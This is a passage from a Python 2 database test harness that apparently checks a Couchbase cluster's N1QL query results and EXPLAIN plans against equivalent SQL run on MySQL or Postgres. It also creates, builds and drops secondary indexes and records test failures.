if (n1ql_query.find("simple_table") > 0) and ((self.database+"_"+"simple_table") not in n1ql_query):
n1ql_query = n1ql_query.replace("simple_table", self.database+"_"+"simple_table")
return n1ql_query
def handle_subquery(self, sql_query, n1ql_query):
aggregate = False
if self.subquery:
n1ql_query = n1ql_query.replace(self.database+"_"+"simple_table_2", "t_5.simple_table_2")
n1ql_query = n1ql_query.replace("t_5.t_5.simple_table_2", "t_5.simple_table_2")
if "qty" in n1ql_query:
n1ql_query = n1ql_query.replace("t_2.qty", "qty")
n1ql_query = n1ql_query.replace("qty", "t_2.qty")
if "sum" in n1ql_query:
n1ql_query = n1ql_query.replace("sum(t_1.productId)", "sum(t_1.qty)")
sql_query = sql_query.replace("sum(t_1.productId)", "sum(t_1.qty)")
n1ql_query = n1ql_query.replace("t_5.simple_table_2 t_1.price", "t_1.price")
sql_query = sql_query.replace("simple_table_2 t_1.price", "t_1.price")
n1ql_query = n1ql_query + " order by primary_key_id limit 5"
sql_query = sql_query + " order by t_5.primary_key_id limit 5"
if "sum" in n1ql_query or "min" in n1ql_query or "max" in n1ql_query or "count" in n1ql_query:
aggregate = True
return sql_query, n1ql_query, aggregate
def handle_hash_join(self, n1ql_query):
if self.ansi_joins and self.hash_joins:
hash_join_template_list = ["HASH(build)", "HASH(probe)"]
n1ql_query.replace(" ON ", "{0} ON ".random.choice(hash_join_template_list))
return n1ql_query
def _run_query_with_pushdown_check(self, n1ql_query, index):
message = "Pass"
explain_check = False
if isinstance(index, dict):
index = [index]
query = self.query_helper._add_index_hints_to_query(n1ql_query, index)
explain_n1ql = "EXPLAIN " + query
try:
actual_result = self.n1ql_helper.run_cbq_query(query=explain_n1ql, server=self.n1ql_server)
if "index_group_aggs" in str(actual_result):
explain_check = True
if not explain_check:
message = "aggregate query {0} with index {1} failed explain result, index_group_aggs not found".format(n1ql_query, index)
self.log.info(message)
self.log.info(str(actual_result))
except Exception, ex:
self.log.info(ex)
message = ex
explain_check = False
finally:
return {"success": explain_check, "result": message}
def _verify_query_with_hash_joins(self, n1ql_query):
message = "Pass"
explain_check = True
explain_n1ql = "EXPLAIN " + n1ql_query
hash_query_count = n1ql_query.count("HASH")
try:
actual_result = self.n1ql_helper.run_cbq_query(query=explain_n1ql, server=self.n1ql_server)
hash_explain_count = str(actual_result).count("HashJoin")
explain_check = (hash_query_count == hash_explain_count)
if not explain_check:
message = "Join query {0} with failed explain result, HashJoins not found".format(n1ql_query)
self.log.info(message)
self.log.info(str(actual_result))
except Exception, ex:
self.log.info(ex)
message = ex
explain_check = False
finally:
return {"success": explain_check, "result": message}
def _run_basic_crud_test(self, test_data, verification_query, test_case_number, result_queue, failure_record_queue=None, table_name=None):
self.log.info(" <<<<<<<<<<<<<<<<<<<<<<<<<<<< BEGIN RUNNING TEST {0} >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>".format(test_case_number))
result_run = {}
n1ql_query = test_data["n1ql_query"]
if n1ql_query.find("copy_simple_table") > 0:
n1ql_query = n1ql_query.replace("simple_table", self.database+"_"+"simple_table")
n1ql_query = n1ql_query.replace("copy_"+self.database+"_"+"simple_table", "copy_simple_table")
n1ql_query = n1ql_query.replace("ON KEY copy_simple_table", "ON KEY " + self.database+"_"+"copy_simple_table")
else:
n1ql_query = n1ql_query.replace("simple_table", self.database+"_"+"simple_table")
test_data["n1ql_query"] = n1ql_query
sql_query = test_data["sql_query"]
result_run["n1ql_query"] = n1ql_query
result_run["sql_query"] = sql_query
result_run["test_case_number"] = test_case_number
self.log.info("SQL :: {0}".format(sql_query))
self.log.info("N1QL :: {0}".format(n1ql_query))
crud_ops_run_result = None
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
try:
self.n1ql_query_runner_wrapper(n1ql_query=n1ql_query, server=self.n1ql_server)
client._insert_execute_query(query=sql_query)
except Exception, ex:
self.log.info(ex)
crud_ops_run_result = {"success": False, "result": str(ex)}
client._close_connection()
client._close_connection()
if crud_ops_run_result is None:
query_index_run = self._run_queries_and_verify_crud(n1ql_query=verification_query, sql_query=verification_query, expected_result=None, table_name=table_name)
else:
query_index_run = crud_ops_run_result
result_run["crud_verification_test"] = query_index_run
result_queue.put(result_run)
self._check_and_push_failure_record_queue(result_run, test_data, failure_record_queue)
self.log.info(" <<<<<<<<<<<<<<<<<<<<<<<<<<<< END RUNNING TEST {0} >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>".format(test_case_number))
def _test_result_analysis(self, queue):
result_list = []
pass_case = 0
fail_case = 0
failure_map = {}
keyword_map = {}
failure_reason_map = {}
success = True
while not queue.empty():
result_list.append(queue.get())
total = len(result_list)
for result_run in result_list:
test_case_number = result_run["test_case_number"]
sql_query = result_run["sql_query"]
n1ql_query = result_run["n1ql_query"]
check, message, failure_types = self._analyze_result(result_run)
success = success and check
if check:
pass_case += 1
else:
fail_case += 1
for failure_reason_type in failure_types:
if failure_reason_type not in failure_reason_map.keys():
failure_reason_map[failure_reason_type] = 1
else:
failure_reason_map[failure_reason_type] += 1
keyword_list = self.query_helper.find_matching_keywords(n1ql_query, self.keyword_list)
for keyword in keyword_list:
if keyword not in keyword_map.keys():
keyword_map[keyword] = 1
else:
keyword_map[keyword] += 1
failure_map[test_case_number] = {"sql_query": sql_query, "n1ql_query": n1ql_query,
"run_result": message, "keyword_list": keyword_list}
pass_percent = 0
if total > 0:
summary = " Total Queries Run = {0}, Pass = {1}, Fail = {2}, Pass Percentage = {3} %".format(total, pass_case, fail_case, ((pass_case*100)/total))
else:
summary = " No Query Results Found"
if len(keyword_map) > 0:
summary += "\n [ KEYWORD FAILURE DISTRIBUTION ] \n"
for keyword in keyword_map.keys():
summary += keyword+" :: " + str((keyword_map[keyword]*100)/total)+"%\n "
if len(failure_reason_map) > 0:
summary += "\n [ FAILURE TYPE DISTRIBUTION ] \n"
for keyword in failure_reason_map.keys():
summary += keyword+" :: " + str((failure_reason_map[keyword]*100)/total)+"%\n "
self.log.info(" Total Queries Run = {0}, Pass = {1}, Fail = {2}, Pass Percentage = {3} %".format(total, pass_case, fail_case, ((pass_case*100)/total)))
result = self._generate_result(failure_map)
return success, summary, result
def _gen_expected_result(self, sql="", test=49):
sql_result = []
try:
client = None
if self.use_mysql:
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
elif self.use_postgres:
client = RQGPostgresClient()
if test == 51:
columns = []
rows = []
else:
columns, rows = client._execute_query(query=sql)
if self.aggregate_pushdown:
sql_result = client._gen_json_from_results_repeated_columns(columns, rows)
else:
sql_result = client._gen_json_from_results(columns, rows)
client._close_connection()
except Exception, ex:
self.log.info(ex)
traceback.print_exc()
if ex.message.__contains__("SQL syntax") or ex.message.__contains__("ERROR"):
print "Error in sql syntax"
return sql_result
def _check_explain_plan_for_secondary_index(self, n1ql_query=None):
self.n1ql_query_runner_wrapper(n1ql_query=n1ql_query, server=self.n1ql_server)
actual_result = self.n1ql_helper.run_cbq_query(query="EXPLAIN "+n1ql_query, server=self.n1ql_server)
self.log.info("EXPLAIN PLAN :: "+str(actual_result))
if "PrimaryScan" in str(actual_result['results'][0]['plan']):
return {"success": False, "result": "Fail"}
else:
return {"success": True, "result": "Pass"}
def _run_queries_and_verify(self, aggregate=False, subquery=False, n1ql_query=None, sql_query=None, expected_result=None):
if not self.create_primary_index:
n1ql_query = n1ql_query.replace("USE INDEX(`#primary` USING GSI)", " ")
if self.prepared:
n1ql_query = "PREPARE " + n1ql_query
self.log.info(" SQL QUERY :: {0}".format(sql_query))
self.log.info(" N1QL QUERY :: {0}".format(n1ql_query))
# Run n1ql query
hints = self.query_helper._find_hints(sql_query)
for i, item in enumerate(hints):
if "simple_table" in item:
hints[i] = hints[i].replace("simple_table", self.database+"_"+"simple_table")
try:
if subquery:
query_params = {'timeout': '1200s'}
else:
query_params={}
actual_result = self.n1ql_query_runner_wrapper(n1ql_query=n1ql_query, server=self.n1ql_server, query_params=query_params, scan_consistency="request_plus")
if self.prepared:
name = actual_result["results"][0]['name']
prepared_query = "EXECUTE '%s'" % name
self.log.info(" N1QL QUERY :: {0}".format(prepared_query))
actual_result = self.n1ql_query_runner_wrapper(n1ql_query=prepared_query, server=self.n1ql_server, query_params=query_params, scan_consistency="request_plus")
n1ql_result = actual_result["results"]
# Run SQL Query
sql_result = expected_result
client = None
if self.use_mysql:
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
elif self.use_postgres:
client = RQGPostgresClient()
if expected_result is None:
columns, rows = client._execute_query(query=sql_query)
if self.aggregate_pushdown:
sql_result = client._gen_json_from_results_repeated_columns(columns, rows)
else:
sql_result = client._gen_json_from_results(columns, rows)
client._close_connection()
self.log.info(" result from n1ql query returns {0} items".format(len(n1ql_result)))
self.log.info(" result from sql query returns {0} items".format(len(sql_result)))
if len(n1ql_result) != len(sql_result):
self.log.info("number of results returned from sql and n1ql are different")
self.log.info("sql query is {0}".format(sql_query))
self.log.info("n1ql query is {0}".format(n1ql_query))
if (len(sql_result) == 0 and len(n1ql_result) == 1) or (len(n1ql_result) == 0 and len(sql_result) == 1) or (len(sql_result) == 0):
return {"success": True, "result": "Pass"}
return {"success": False, "result": str("different results")}
try:
self.n1ql_helper._verify_results_rqg(subquery, aggregate, sql_result=sql_result, n1ql_result=n1ql_result, hints=hints, aggregate_pushdown=self.aggregate_pushdown)
except Exception, ex:
self.log.info(ex)
traceback.print_exc()
return {"success": False, "result": str(ex)}
return {"success": True, "result": "Pass"}
except Exception, ex:
self.log.info(ex)
traceback.print_exc()
return {"success": False, "result": str(ex)}
def _run_queries_and_verify_crud(self, n1ql_query=None, sql_query=None, expected_result=None, table_name=None):
self.log.info(" SQL QUERY :: {0}".format(sql_query))
self.log.info(" N1QL QUERY :: {0}".format(n1ql_query))
if n1ql_query.find(self.database) <= 0:
n1ql_query = n1ql_query.replace("simple_table", self.database+"_"+"simple_table")
hints = self.query_helper._find_hints(sql_query)
for i, item in enumerate(hints):
if "simple_table" in item:
hints[i] = hints[i].replace("simple_table", self.database+"_"+"simple_table")
try:
actual_result = self.n1ql_query_runner_wrapper(n1ql_query=n1ql_query, server=self.n1ql_server, scan_consistency="request_plus")
n1ql_result = actual_result["results"]
# Run SQL Query
sql_result = expected_result
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
if expected_result is None:
columns, rows = client._execute_query(query=sql_query)
sql_result = client._gen_json_from_results(columns, rows)
client._close_connection()
self.log.info(" result from n1ql query returns {0} items".format(len(n1ql_result)))
self.log.info(" result from sql query returns {0} items".format(len(sql_result)))
if len(n1ql_result) != len(sql_result):
self.log.info("number of results returned from sql and n1ql are different")
self.log.info("sql query is {0}".format(sql_query))
self.log.info("n1ql query is {0}".format(n1ql_query))
if (len(sql_result) == 0 and len(n1ql_result) == 1) or (len(n1ql_result) == 0 and len(sql_result) == 1) or (len(sql_result) == 0):
return {"success": True, "result": "Pass"}
try:
self.n1ql_helper._verify_results_crud_rqg(sql_result=sql_result, n1ql_result=n1ql_result, hints=hints)
except Exception, ex:
self.log.info(ex)
return {"success": False, "result": str(ex)}
return {"success": True, "result": "Pass"}
except Exception, ex:
return {"success": False, "result": str(ex)}
def _run_queries_with_explain(self, n1ql_query=None, indexes={}):
run_result = {}
# Run n1ql query
for index_name in indexes:
hint = "USE INDEX({0} USING {1})".format(index_name, indexes[index_name]["type"])
n1ql = self.query_helper._add_explain_with_hints(n1ql_query, hint)
self.log.info(n1ql)
message = "Pass"
check = True
fieldsnotcovered = False
if self.check_covering_index:
query = "select * from system:indexes where name = '%s'" % index_name
actual_result = self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server)
n1ql_result = actual_result["results"]
fields = n1ql_result[0]["indexes"]["index_key"]
fieldsnotcovered = self.query_helper.check_groupby_orderby(n1ql_query, fields)
if "NOT" in n1ql or "not" in n1ql or fieldsnotcovered and self.check_covering_index:
key = "Explain for index {0}".format(index_name)
run_result[key] = {"success": check, "result": message}
else:
try:
actual_result = self.n1ql_query_runner_wrapper(n1ql_query=n1ql, server=self.n1ql_server)
self.log.info(actual_result)
check = self.n1ql_helper.verify_index_with_explain(actual_result, index_name,
self.check_covering_index)
if not check:
message = " query {0} failed explain result, index {1} not found".format(n1ql_query, index_name)
self.log.info(message)
except Exception, ex:
self.log.info(ex)
message = ex
check = False
finally:
key = "Explain for index {0}".format(index_name)
run_result[key] = {"success": check, "result": message}
return run_result
def _run_explain_queries(self, n1ql_query=None, keyword ="", present=True):
run_result = {}
# Run n1ql query
n1ql = self.query_helper._add_explain_with_hints(n1ql_query)
self.log.info("Running query: " + n1ql)
message = "Pass"
try:
actual_result = self.n1ql_query_runner_wrapper(n1ql_query=n1ql, server=self.n1ql_server)
self.log.info(actual_result)
check = self.n1ql_helper.verify_explain(actual_result, keyword, present)
if not check:
if present:
message = " query {0} failed explain result, keyword {1} not found".format(n1ql_query, keyword)
else:
message = " query {0} failed explain result, keyword {1} was found but should not be present".format(n1ql_query, keyword)
self.log.info(message)
except Exception, ex:
self.log.info(ex)
message = ex
check = False
finally:
key = "Explain for query: {0}".format(n1ql)
run_result[key] = {"success": check, "result": message}
return run_result
def _initialize_cluster_setup(self):
if self.use_mysql:
self.log.info(" Will load directly from mysql")
self._initialize_mysql_client()
if not self.generate_input_only:
self._setup_and_load_buckets()
elif self.use_postgres:
self._initialize_postgres_client()
if not self.generate_input_only:
self._setup_and_load_buckets()
else:
self.log.info(" Will load directly from file snap-shot")
if self.populate_with_replay:
self._initialize_mysql_client()
self._setup_and_load_buckets_from_files()
self.n1ql_helper = self._initialize_n1ql_helper()
# create copy of simple table if this is a merge operation
self.sleep(10)
if self.gsi_type == "memory_optimized":
os.system("curl -X POST http://Administrator:password@{1}:8091/pools/default -d memoryQuota={0} -d indexMemoryQuota={2}".format(self.ram_quota, self.n1ql_server.ip, self.indexer_memQuota))
self.sleep(10)
if self.change_bucket_properties:
shell = RemoteMachineShellConnection(self.master)
shell.execute_command("curl -X POST -u {0}:{1} -d maxBucketCount=25 http://{2}:{3}/internalSettings".format(self.user_cluster, self.password_cluster, self.master.ip, self.master.port))
self.sleep(10, "Updating maxBucket count to 15")
self._build_indexes()
def _build_indexes(self):
self.sec_index_map = {}
fields = ['primary_key_id','bool_field1','char_field1','datetime_field1','decimal_field1',
'int_field1','varchar_field1']
if self.create_secondary_indexes:
if self.use_mysql or self.use_postgres:
self.sec_index_map = self.client._gen_index_combinations_for_tables(partitioned_indexes=self.partitioned_indexes)
else:
self.sec_index_map = self._extract_secondary_index_map_from_file(self.secondary_index_info_path)
if not self.generate_input_only:
if self.create_primary_index:
self._build_primary_indexes(self.using_gsi)
if self.create_secondary_meta_indexes:
index_name = ""
for table_name in self.sec_index_map.keys():
queries = {}
index_name = table_name
query = "CREATE INDEX {0} ON {1}(primary_key_id,bool_field1,char_field1," \
"datetime_field1," \
"decimal_field1,int_field1,varchar_field1)".format(table_name, self.database + "_" + table_name)
queries[index_name] = query
if self.create_secondary_ansi_join_indexes:
for field in fields:
index_name = table_name+"_"+field
query = "CREATE INDEX {0} ON {1}({2})".format(table_name+"_"+field, self.database+"_"+table_name, field)
queries[index_name] = query
for index_name in queries.keys():
try:
self.n1ql_helper.run_cbq_query(query=queries[index_name],
server=self.n1ql_server, verbose=False)
check = self.n1ql_helper.is_index_online_and_in_list(self.database+"_"+table_name,
index_name ,
server=self.n1ql_server,
timeout=240)
except Exception, ex:
self.log.info(ex)
if self.create_secondary_indexes and (not self.create_secondary_meta_indexes):
thread_list = []
if self.build_secondary_index_in_seq:
for table_name in self.sec_index_map.keys():
self._gen_secondary_indexes_per_table(self.database+"_"+table_name, self.sec_index_map[table_name], 0)
else:
for table_name in self.sec_index_map.keys():
t = threading.Thread(target=self._gen_secondary_indexes_per_table, args=(self.database+"_"+table_name, self.sec_index_map[table_name]))
t.daemon = True
t.start()
thread_list.append(t)
for t in thread_list:
t.join()
def _build_primary_indexes(self, using_gsi=True):
if self.create_primary_index:
if not self.partitioned_indexes:
self.n1ql_helper.create_primary_index(using_gsi=using_gsi, server=self.n1ql_server)
else:
self.n1ql_helper.create_partitioned_primary_index(using_gsi=using_gsi, server=self.n1ql_server)
def _load_bulk_data_in_buckets_using_n1ql(self, bucket, data_set):
try:
n1ql_query = self.query_helper._builk_insert_statement_n1ql(bucket.name, data_set)
self.n1ql_helper.run_cbq_query(query=n1ql_query, server=self.n1ql_server, verbose=False)
except Exception, ex:
self.log.info('WARN=======================')
self.log.info(ex)
def _load_data_in_buckets_using_mc_bin_client_json(self, bucket, data_set):
client = VBucketAwareMemcached(RestConnection(self.master), bucket)
try:
for key in data_set.keys():
client.set(key.encode("utf8"), 0, 0, json.dumps(data_set[key]))
except Exception, ex:
self.log.info('WARN=======================')
self.log.info(ex)
def _initialize_rqg_query_helper(self):
return RQGQueryHelper()
def _initialize_n1ql_helper(self):
return N1QLHelper(version="sherlock", shell=None, max_verify=self.max_verify,
buckets=self.buckets, item_flag=None, n1ql_port=getattr(self.n1ql_server, 'n1ql_port', 8903),
full_docs_list=[], log=self.log, input=self.input, master=self.master,
database=self.database, use_rest=self.use_rest)
def _initialize_mysql_client(self):
if self.reset_database:
self.client = RQGMySQLClient(host=self.mysql_url, user_id=self.user_id, password=self.password)
if self.subquery:
path = "b/resources/rqg/{0}/database_definition/definition-subquery.sql".format(self.database)
else:
path = "b/resources/rqg/{0}/database_definition/definition.sql".format(self.database)
self.database = self.database+"_"+str(self.query_helper._random_int())
populate_data = False
if not self.populate_with_replay:
populate_data = True
if self.subquery:
self.client.reset_database_add_data(database=self.database, items=self.items, sql_file_definiton_path=path, populate_data=populate_data, number_of_tables=1)
else:
self.client.reset_database_add_data(database=self.database, items=self.items, sql_file_definiton_path=path, populate_data=populate_data, number_of_tables=self.number_of_buckets)
self._copy_table_for_merge()
else:
self.client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
def _initialize_postgres_client(self):
self.client = RQGPostgresClient()
self.client.reset_database_add_data()
def _copy_table_for_merge(self):
table_list = self.client._get_table_list()
reference_table = table_list[0]
if self.merge_operation:
path = "b/resources/rqg/crud_db/database_definition/table_definition.sql"
self.client.database_add_data(database=self.database, sql_file_definiton_path=path)
table_list = self.client._get_table_list()
for table_name in table_list:
if table_name != reference_table:
sql = "INSERT INTO {0} SELECT * FROM {1}".format(table_name, reference_table)
self.client._insert_execute_query(sql)
table_list = self.client._get_table_list()
for table_name in table_list:
self.client_map[table_name] = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
def _generate_result(self, data):
result = ""
for key in data.keys():
result +="<<<<<<<<<< TEST {0} >>>>>>>>>>> \n".format(key)
for result_key in data[key].keys():
result += "{0} :: {1} \n".format(result_key, data[key][result_key])
return result
def _gen_secondary_indexes_per_table(self, table_name="", index_map={}, sleep_time=2):
if self.partitioned_indexes:
defer_mode = str({"defer_build": "true", "num_partition":2})
else:
defer_mode = str({"defer_build": "true"})
build_index_list = []
batch_index_definitions = index_map
if self.pushdown:
table_field_map = self.client._get_field_list_map_for_tables()
fields = table_field_map['simple_table']
combination_fields = sum([map(list, combinations(fields, i)) for i in range(len(fields) + 1)], [])
for x in xrange(1, len(combination_fields)):
input = combination_fields[x]
if len(input) == 1:
fields_indexed = str(input[0])
index_name = "ix_" + str(0) + str(x)
else:
fields_indexed = str(input[0])
#TODO: this code is really weird!
for i in xrange(1, len(input)):
index_name = "ix_" + str(i) + str(x)
fields_indexed = fields_indexed+"," + str(x[i])
if self.partitioned_indexes:
query = "CREATE INDEX {0} ON {1}({2}) PARTITION BY HASH(meta().id)".format(
index_name, table_name, fields_indexed)
else:
query = "CREATE INDEX {0} ON {1}({2})".format(index_name,
table_name,
fields_indexed)
build_index_list.append(index_name)
self.log.info(" Running Query {0} ".format(query))
try:
self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server, verbose=False)
build_index_list.append(index_name)
self.n1ql_helper.is_index_online_and_in_list(table_name, index_name, server=self.n1ql_server, timeout=240)
except Exception, ex:
self.log.info(ex)
if self.dynamic_indexing:
index_name = "idx_" + table_name
query = "CREATE INDEX {0} ON {1}(DISTINCT ARRAY v FOR v IN PAIRS(SELF) END) WITH {2}".format(index_name, table_name, defer_mode)
build_index_list.append(index_name)
self.log.info(" Running Query {0} ".format(query))
try:
self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server, verbose=False)
build_index_list.append(index_name)
except Exception, ex:
self.log.info(ex)
raise
else:
for index_name in batch_index_definitions.keys():
query = "{0} WITH {1}".format(
batch_index_definitions[index_name]["definition"],
defer_mode)
build_index_list.append(index_name)
self.log.info(" Running Query {0} ".format(query))
try:
self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server, verbose=False)
build_index_list.append(index_name)
except Exception, ex:
self.log.info(ex)
traceback.print_exc()
raise
# Run Build Query
if build_index_list is not None and len(build_index_list) > 0:
batch_size = 0
end_index_batch = 0
total_indexes = 0
while total_indexes < len(build_index_list):
start_index_batch = end_index_batch
end_index_batch = min(end_index_batch+self.build_index_batch_size, len(build_index_list))
batch_size += 1
if start_index_batch == end_index_batch:
break
list_build_index_list = build_index_list[start_index_batch:end_index_batch]
total_indexes += len(list_build_index_list)
try:
build_query = "BUILD INDEX on {0}({1}) USING GSI".format(table_name, ",".join(list_build_index_list))
actual_result = self.n1ql_helper.run_cbq_query(query=build_query, server=self.n1ql_server)
self.log.info(actual_result)
self.sleep(15, "sleep after building index")
except Exception, ex:
self.log.info(ex)
traceback.print_exc()
raise
self.sleep(sleep_time)
def _extract_secondary_index_map_from_file(self, file_path="/tmp/index.txt"):
with open(file_path) as data_file:
return json.load(data_file)
def _generate_secondary_indexes_in_batches(self, batches):
if self.generate_input_only:
return
defer_mode = str({"defer_build": "true"})
if self.partitioned_indexes:
defer_mode = str({"defer_build": "true", "num_partition":2})
batch_index_definitions = {}
build_index_list = []
# add indexes to batch_index_definitions
for info in batches:
table_name = info["bucket"]
batch_index_definitions.update(info["indexes"])
for index_name in batch_index_definitions.keys():
query = "{0} WITH {1}".format(batch_index_definitions[index_name]["definition"], defer_mode)
query = query.replace("ON simple_table", "ON "+self.database+"_"+"simple_table")
if self.aggregate_pushdown:
query = query.replace("limit 10 offset 4", "")
self.log.info(" Running Query {0} ".format(query))
try:
self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server)
if index_name not in build_index_list:
build_index_list.append(index_name)
except Exception, ex:
self.log.info(ex)
traceback.print_exc()
raise
# Run Build Query
if build_index_list is not None and len(build_index_list) > 0:
try:
build_query = "BUILD INDEX on {0}({1}) USING GSI".format(self.database+"_"+table_name, ",".join(build_index_list))
actual_result = self.n1ql_helper.run_cbq_query(query=build_query, server=self.n1ql_server)
self.log.info(actual_result)
except Exception, ex:
self.log.info(ex)
traceback.print_exc()
raise
# Monitor till the index is built
tasks = []
try:
for info in batches:
table_name = info["bucket"]
table_name = self.database+"_"+table_name
for index_name in info["indexes"]:
if index_name in build_index_list:
tasks.append(self.async_monitor_index(bucket=table_name, index_name=index_name))
for task in tasks:
task.result()
except Exception, ex:
traceback.print_exc()
self.log.info(ex)
def async_monitor_index(self, bucket, index_name=None):
monitor_index_task = self.cluster.async_monitor_index(server=self.n1ql_server, bucket=bucket,
n1ql_helper=self.n1ql_helper, index_name=index_name)
return monitor_index_task
def are_any_indexes_present(self, index_name_list):
query_response = self.n1ql_helper.run_cbq_query("SELECT * FROM system:indexes")
current_indexes = [i['indexes']['name'] for i in query_response['results']]
for index_name in index_name_list:
if index_name in current_indexes:
return True
return False
def wait_for_index_drop(self, index_name_list):
self.with_retry(lambda: self.are_any_indexes_present(index_name_list), eval=False, delay=1, tries=30)
def with_retry(self, func, eval=True, delay=5, tries=10):
attempts = 0
while attempts < tries:
attempts = attempts + 1
res = func()
if res == eval:
return res
else:
self.sleep(delay, 'incorrect results, sleeping for %s' % delay)
raise Exception('timeout, invalid results: %s' % res)
def _drop_secondary_indexes_in_batches(self, batches):
dropped_indexes = []
for info in batches:
table_name = info["bucket"]
table_name = self.database+"_"+table_name
for index_name in info["indexes"].keys():
if index_name not in dropped_indexes:
query = "DROP INDEX {0}.{1} USING {2}".format(table_name, index_name,
info["indexes"][index_name]["type"])
try:
self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server,
query_params={'timeout': '900s'})
dropped_indexes.append(index_name)
except Exception, ex:
self.log.info("Error: " + str(ex))
self.wait_for_index_drop(info["indexes"].keys())
def _analyze_result(self, result):
check = True
failure_types = []
message = "\n ____________________________________________________\n "
for key in result.keys():
if key != "test_case_number" and key != "n1ql_query" and key != "sql_query" and key!="check_explain_plan":
check = check and result[key]["success"]
if not result[key]["success"]:
failure_types.append(key)
message += " Scenario :: {0} \n".format(key)
message += " Reason :: " + str(result[key]["result"]) + "\n"
if key == "check_explain_plan":
check = check and result[key]["success"]
if not result[key]["success"]:
failure_types.append(key)
message += " Scenario :: {0} \n".format(key)
message += " Reason :: Secondary index is not in use\n"
return check, message, failure_types
def _check_and_push_failure_record_queue(self, result, data, failure_record_queue):
if not self.record_failure:
return
for key in result.keys():
if key != "test_case_number" and key != "n1ql_query" and key != "sql_query" and not result[key]["success"]:
failure_record_queue.put(data)
def dump_failure_data(self, failure_record_queue):
if not self.record_failure:
return
import uuid
sub_dir = str(uuid.uuid4()).replace("-","")
self.data_dump_path = self.failure_record_path+"/"+sub_dir
os.mkdir(self.data_dump_path)
input_file_path = self.data_dump_path+"/input"
os.mkdir(input_file_path)
f_write_file = open(input_file_path+"/source_input_rqg_run.txt",'w')
secondary_index_path = self.data_dump_path+"/index"
os.mkdir(secondary_index_path)
database_dump = self.data_dump_path+"/db_dump"
os.mkdir(database_dump)
f_write_index_file = open(secondary_index_path+"/secondary_index_definitions.txt",'w')
client = None
if self.use_mysql:
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
elif self.use_postgres:
client = RQGPostgresClient()
client.dump_database(data_dump_path=database_dump)
client._close_connection()
f_write_index_file.write(json.dumps(self.sec_index_map))
f_write_index_file.close()
while not failure_record_queue.empty():
f_write_file.write(json.dumps(failure_record_queue.get())+"\n")
f_write_file.close()
def unzip_template(self, template_path):
if "zip" not in template_path:
return template_path
tokens = template_path.split("/")
file_name = tokens[len(tokens)-1]
output_path = template_path.replace(file_name, "")
with zipfile.ZipFile(template_path, "r") as z:
z.extractall(output_path)
template_path = template_path.replace(".zip", "")
return template_path
def _setup_and_load_buckets_from_files(self):
bucket_list = []
#Unzip the files and get bucket list
tokens = self.db_dump_path.split("/")
data_file_path = self.db_dump_path.replace(tokens[len(tokens)-1], "data_dump")
os.mkdir(data_file_path)
with zipfile.ZipFile(self.db_dump_path, "r") as z:
z.extractall(data_file_path)
onlyfiles = [f for f in listdir(data_file_path) if isfile(join(data_file_path, f))]
for file in onlyfiles:
bucket_list.append(file.split(".")[0])
# Remove any previous buckets
for bucket in self.buckets:
self.rest.delete_bucket(bucket.name)
self.buckets = []
# Create New Buckets
self._create_buckets(self.master, bucket_list, server_id=None, bucket_size=None)
# Wait till the buckets are up
self.sleep(15)
# Read Data from mysql database and populate the couchbase server
for bucket_name in bucket_list:
for bucket in self.buckets:
if bucket.name == bucket_name:
file_path = data_file_path+"/"+bucket_name+".txt"
with open(file_path) as data_file:
data = json.load(data_file)
self._load_data_in_buckets_using_mc_bin_client_json(bucket, data)
if self.populate_with_replay:
for key in data.keys():
insert_sql = self.query_helper._generate_insert_statement_from_data(bucket_name, data[key])
self.client._insert_execute_query(insert_sql)
shutil.rmtree(data_file_path, ignore_errors=True)
def fill_advise_dict(self, bucket_list=[]):
for bucket in bucket_list:
if bucket not in self.advise_dict.keys():
self.advise_dict[bucket] = self.advise_buckets[0]
self.advise_buckets.remove(self.advise_buckets[0])
def _setup_and_load_buckets(self):
# Remove any previous buckets
if self.skip_setup_cleanup:
for bucket in self.buckets:
self.rest.delete_bucket(bucket.name)
self.buckets = []
if self.change_bucket_properties or self.gsi_type == "memory_optimized":
bucket_size = 100
else:
bucket_size = None
if self.change_bucket_properties:
shell = RemoteMachineShellConnection(self.master)
shell.execute_command("curl -X POST -u {0}:{1} -d maxBucketCount=25 http://{2}:{3}/internalSettings".format(self.user_cluster, self.password_cluster, self.master.ip, self.master.port))
self.sleep(10, "Updating maxBucket count to 25")
# Pull information about tables from mysql database and interpret them as no-sql dbs
table_key_map = self.client._get_primary_key_map_for_tables()
# Make a list of buckets that we want to create for querying
bucket_list = table_key_map.keys()
self.log.info("database used is {0}".format(self.database))
new_bucket_list = []
for bucket in bucket_list:
if bucket.find("copy_simple_table") > 0:
new_bucket_list.append(self.database+"_"+"copy_simple_table")
else:
new_bucket_list.append(self.database + "_" + bucket)
if self.subquery:
break
# Create New Buckets
self.fill_advise_dict(new_bucket_list)
self._create_buckets(self.master, new_bucket_list, server_id=None, bucket_size=bucket_size)
self.log.info("buckets created")
# Wait till the buckets are up
self.sleep(5)
self.buckets = self.rest.get_buckets()
self.newbuckets = []
for bucket in self.buckets:
if bucket.name in new_bucket_list:
self.newbuckets.append(bucket)
self.log.info("safe to start another job")
self.record_db = {}
self.buckets = self.newbuckets
# Read Data from mysql database and populate the couchbase server
for bucket_name in bucket_list:
query = "select * from {0}".format(bucket_name)
columns, rows = self.client._execute_query(query=query)
self.record_db[bucket_name] = self.client._gen_json_from_results_with_primary_key(columns, rows, primary_key=table_key_map[bucket_name])
if self.subquery:
for bucket in self.newbuckets:
if bucket.name == self.database+"_"+bucket_name:
self.load_subquery_test_data(bucket)
else:
for bucket in self.newbuckets:
if bucket.name == self.database+"_"+bucket_name:
